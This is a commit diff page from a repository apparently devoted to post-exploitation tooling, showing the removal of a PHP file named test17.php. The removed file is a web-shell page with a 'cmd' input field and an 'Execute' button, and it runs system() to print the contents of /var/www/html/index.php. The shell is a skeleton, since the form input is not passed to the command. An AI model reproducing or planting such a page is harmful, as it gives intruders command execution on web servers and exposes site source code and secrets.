Projects STRLCPY 7-ZipPostExp Commits 006e643f
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■ ■ ■
    test17.php
    1  -<!DOCTYPE html>
    2  - 
    3  -<html>
    4  -<body>
    5  -<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
    6  -<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
    7  -<input type="SUBMIT" value="Execute">
    8  -</form>
    9  -<pre>
    10  -<?php
    11  - echo system('cat /var/www/html/index.php');
    12  -
    13  -?>
    14  -</pre>
    15  -</body>
    16  -</html>
    17  - 
Please wait...
Page is in error, reload to recover